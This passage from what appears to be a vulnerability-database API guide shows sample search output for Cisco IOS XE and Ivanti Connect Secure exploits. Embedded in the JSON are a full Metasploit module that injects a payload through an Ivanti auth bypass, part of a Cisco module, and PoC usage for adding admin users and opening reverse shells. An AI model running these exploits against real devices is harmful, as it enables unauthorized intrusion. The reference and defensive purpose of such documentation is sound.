CVE-2023-20198. \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'], \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'] \n], \n'DisclosureDate' => '2023-10-16', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('CMD', [ true, 'The CLI command to execute.', 'show version']), \nOptString.new('MODE', [ true, \"The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.\", Mode::PRIVILEGED_EXEC]) \n] \n) \nend \n \ndef run \n# We convert escaped newlines into actual newlines, as the Cisco CLI will allow you to navigate from an upper mode \n# (e.g. Global) down to a lower mode (e.g. Privileged or User) via the \"exit\" command. We explicitly let a user \n# specify the mode to execute their CMD in, via the MODE option, however we must still support the user specifying \n# newlines as they may want to execute multiple commands (or manually navigate the difference modes). \ncmd = datastore['CMD'].gsub('\\\\n', \"\\n\") \nif cmd.empty? \nprint_error('Command can not be empty.') \nreturn \nend \n \nmode = Mode.to_mode(datastore['MODE'].to_s.downcase) \nif mode.nil? \nprint_error(\"Invalid mode specified, valid values are 'user', 'privileged', or 'global'\") \nreturn \nend \n \nresult = run_cli_command(cmd, mode) \nif result.nil? \nprint_error('Failed to run the command.') \nreturn \nend \n \nprint_line(result) \nend \n \nend \n`\n",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"sourceHref": "https://packetstormsecurity.com/files/download/180826/cisco_ios_xe_cli_exec_cve_2023_20198.rb.txt",
"vhref": "https://vulners.com/packetstorm/PACKETSTORM:180826"
},
{
"lastseen": "2024-08-29T17:42:53",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 & 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
"modified": "2024-08-22T13:08:12",
"id": "BD95D173-6A21-51A9-837D-51BCE64F5340",
"published": "2023-10-17T22:41:14",
"href": "https://github.com/ZephrFish/Cisco-IOS-XE-Scanner",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/BD95D173-6A21-51A9-837D-51BCE64F5340"
}
]
Output with search method:
[
{
"lastseen": "2024-09-12T13:39:16",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>\n[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>\n\n## TODO\n- [ ] https support\n- [ ] CVE-2023-20273 Implementation\n- [ ] Timeout and error handling\n\n## Disclaimer\nThe code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>\nThe author of this project is not responsible or liable for misuse of the software.<br>\nUse responsibly and don't be evil\n\n",
"modified": "2024-09-12T06:33:33",
"id": "943D5962-14B3-5410-8106-BD5EEA778153",
"published": "2023-11-16T16:39:38",
"href": "https://github.com/smokeintheshell/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/943D5962-14B3-5410-8106-BD5EEA778153"
},
{
"lastseen": "2024-08-28T00:16:11",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20273",
"CVE-2023-20198"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n",
"modified": "2024-08-26T08:31:22",
"id": "1C5F3D5A-F5D6-5471-967F-FD50D6649359",
"published": "2024-08-26T08:16:28",
"href": "https://github.com/sanan2004/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/1C5F3D5A-F5D6-5471-967F-FD50D6649359"
},
{
"lastseen": "2024-08-29T17:42:53",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 & 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
"modified": "2024-08-22T13:08:12",
"id": "BD95D173-6A21-51A9-837D-51BCE64F5340",
"published": "2023-10-17T22:41:14",
"href": "https://github.com/ZephrFish/Cisco-IOS-XE-Scanner",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/BD95D173-6A21-51A9-837D-51BCE64F5340"
},
{
"lastseen": "2024-08-23T13:18:36",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 & 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
"modified": "2024-08-22T13:08:12",
"id": "5770078F-F5C7-5063-98C6-7C111F447FB3",
"published": "2023-10-17T22:41:14",
"href": "https://github.com/ZephrFish/CVE-2023-20198-Checker",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/5770078F-F5C7-5063-98C6-7C111F447FB3"
},
{
"lastseen": "2024-08-13T16:25:12",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20273"
],
"description": "# CVE-2023-20273\nCVE-2023-20273 Exploit PoC\n\n## Usage\n```\nusage: exploit.py [-h] -t URL -u Username -p Password (-c Command | -r) [-dest Outfile] [-www | -tcp | -null] [-ip LocalIP] [-port LocalPort] [-fs filesystem] [-path filepath] [-operation operation_type] [-v] [-q]\n\nCVE-2023-20273 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n\nTarget options:\n [Mandatory] Target arguments\n\n -t URL, --url URL Target Cisco URL (eg https://192.168.1.1 or http://192.168.2.2:8080)\n -u Username, --user Username Cisco webui user name\n -p Password, --pass Password Cisco webui user pass\n\nExploit mode:\n [Mandatory] Exec command or reverse shell\n\n -c Command Command to run\n -r Reverse shell (requires -ip and -port)\n\nOutput Options:\n [Optional] Command output options\n\n -dest Outfile [-r | -www | -tcp] destination file (default: random)\n -www [Default] Attempt to retrieve output via target web server\n -tcp [Not implemented] Attempt to send output to a TCP listener (requires -ip and -port)\n -null Do not attempt to get command output\n\nCallback Options:\n For reverse shell or command output\n\n -ip LocalIP Local IP for reverse shell/command output\n -port LocalPort Local port for reverse shell/command output\n\nExploit options:\n [Not implemented] Exploit modifiers\n\n -fs filesystem Filesystem on target for exploit staging (default: flash)\n -path filepath Filepath on target filesystem for exploit staging (default: shellsmoke)\n -operation operation_type Install operation type (not currently implemented) (default: SMU)\n\nVerbosity control:\n -v Verbose output\n -q Suppress Banner\n```\n",
"modified": "2024-08-12T20:33:05",
"id": "80EF6EF3-C7F8-5300-8CD6-0F3CC33A3011",
"published": "2023-12-09T07:25:43",
"href": "https://github.com/smokeintheshell/CVE-2023-20273",
"type": "githubexploit",
"title": "Exploit for OS Command Injection in Cisco Ios Xe",
"cvss": {
"score": 7.2,
"severity": "HIGH",
"vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/80EF6EF3-C7F8-5300-8CD6-0F3CC33A3011"
}
]
Vulnerabilities/exploits by software name¶
Vulnerabilities by software + version:
Required parameters:
Note
The software name can be a non-exact match, such as "ivanti connect secure", "connect secure", "connect_secure", etc. However, it is better to specify the exact version to obtain precise results.
- software (str): name of the software. For example, "httpd".
- apiKey: Activated API key to authenticate the request.
Optional parameters:
- version (str): version of the software. For example, "2.1".
- vendor (str): The vendor of the software. For example, "Apache".
- respect_major_version (str): If
true
, limits results to the specified major version. Default isfalse
. - exclude_any_version (str): If
true
, excludes extended versions and returns only the exact match. Default isfalse
. - only_ids (bool): If
true
, returns only the IDs of the vulnerabilities. Default isfalse
.
Query:
POST /api/v3/burp/softwareapi/
Query example:
curl -XPOST https://vulners.com/api/v3/burp/softwareapi/ -H 'Content-Type: application/json' -d '{
"software": "connect secure",
"version": "22.3",
"vendor": "Ivanti",
"respect_major_version": "true",
"exclude_any_version": "true",
"only_ids": "false",
"maxVulnerabilities": 10,
"apiKey": "{API key}"
}'
results = vulners_api.get_software_vulnerabilities(
name="connect secure",
version="22.3",
vendor="Ivanti",
respect_major_version="true",
exclude_any_version="true",
only_ids="false"
)
exploit_list = results.get('exploit')
vulnerabilities_list = [results.get(key) for key in results if key in ['exploit']]
[
[
{
"id": "1337DAY-ID-39263",
"type": "zdt",
"bulletinFamily": "exploit",
"title": "Ivanti Connect Secure Unauthenticated Remote Code Execution Exploit",
"description": "This Metasploit module chains an authentication bypass vulnerability and a command injection vulnerability to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are also vulnerable.",
"published": "2024-01-22T00:00:00",
"modified": "2024-01-22T00:00:00",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://0day.today/exploit/description/39263",
"cvelist": [
"CVE-2023-46805",
"CVE-2024-21887"
],
"lastseen": "2024-02-12T12:57:46",
"sourceHref": "https://0day.today/exploit/39263",
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',\n 'Description' => %q{\n This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection\n vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti\n Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and\n 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are\n also vulnerable.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'sfewer-r7', # MSF Exploit & Rapid7 Analysis\n ],\n 'References' => [\n ['CVE', '2023-46805'], # The auth bypass vulnerability.\n ['CVE', '2024-21887'], # The command injection vulnerability.\n ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],\n ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']\n ],\n 'DisclosureDate' => '2024-01-10',\n 'Platform' => %w[linux unix],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true, # Code execution as root.\n 'Targets' => [\n [\n # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n # cmd/linux/http/x64/meterpreter/reverse_tcp\n # cmd/linux/http/x64/shell/reverse_tcp\n # cmd/linux/http/x86/shell/reverse_tcp\n 'Linux Command',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_CMD]\n },\n ],\n [\n # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n # cmd/unix/python/meterpreter/reverse_tcp\n # cmd/unix/reverse_bash\n # cmd/unix/reverse_python\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => [ARCH_CMD]\n },\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'FETCH_WRITABLE_DIR' => '/tmp'\n },\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n end\n\n def check\n # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve\n # the target system version information. If this requests succeeds, the target is vulnerable.\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'\n )\n\n return CheckCode::Unknown('Connection failed') unless res\n\n # If the vendor mitigation has been applied, the request will return 403 Forbidden.\n return CheckCode::Safe if res.code != 200\n\n # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON\n # response, this is only for display purposes, we don't need to test the version information.\n\n json_data = res.get_json_document\n\n name = json_data.dig('software-inventory', 'software', 'name')\n\n version = json_data.dig('software-inventory', 'software', 'version')\n\n build = json_data.dig('software-inventory', 'software', 'build')\n\n # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if\n # get_json_document could not parse the JSON (and will return an empty Hash).\n return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?\n\n Exploit::CheckCode::Vulnerable(\"#{name} #{version} (#{build})\")\n end\n\n def exploit\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',\n 'ctype' => 'application/json',\n 'data' => {\n 'type' => \";#{payload.encoded} #\",\n 'txtGCPProject' => Rex::Text.rand_text_alpha(8),\n 'txtGCPSecret' => Rex::Text.rand_text_alpha(8),\n 'txtGCPPath' => Rex::Text.rand_text_alpha(8),\n 'txtGCPBucket' => Rex::Text.rand_text_alpha(8)\n }.to_json\n )\n end\nend\n",
"ai_score": {
"value": 8.8,
"uncertanity": 2.2,
"vector": "NONE"
}
},
{
"id": "140A9C1C-31CF-5F6B-8425-FE1B5620B837",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Command Injection in Ivanti Connect Secure",
"description": "# \ud83d\udea8 CVE-2024-21887 Exploit Tool \ud83d\udee0\ufe0f\n\nA robust tool for detecting and exploiting the CVE-2024-21887 vulnerability in Ivanti Connect and Policy Secure systems.\n\n## \ud83d\udcdd Description\n\nCVE-2024-21887 is a critical command injection vulnerability, allowing authenticated admins to execute arbitrary commands. This tool aids in identifying and interacting with affected systems.\n\n## \ud83d\ude80 Features\n\n- **Single URL Scan**: Pinpoint focus on a single target.\n- **Bulk Scanning**: Analyze multiple URLs from a file.\n- **Thread Control**: Customize concurrent scanning with thread options.\n- **Output Logging**: Save identified vulnerable URLs to a file.\n\n## \ud83d\udcda How to Use\n\n1. Install dependencies: `pip install -r requirements.txt`\n2. Run the tool:\n - Single URL: `python exploit.py -u <URL>`\n - Bulk scan: `python exploit.py -f <file-path>`\n - With threads: `python exploit.py -f <file-path> -t <number-of-threads>`\n - Save output: `python exploit.py -f <file-path> -o <output-file-path>`\n\n\u26a0\ufe0f **Disclaimer**: This tool is provided for educational and ethical testing purposes only. I am not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing systems that you do not own or have explicit authorization to test.\n",
"published": "2024-01-20T19:15:23",
"modified": "2024-01-21T12:09:30",
"cvss": {
"score": 5.8,
"vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "MULTIPLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8
},
"severity": "MEDIUM",
"exploitabilityScore": 6.4,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
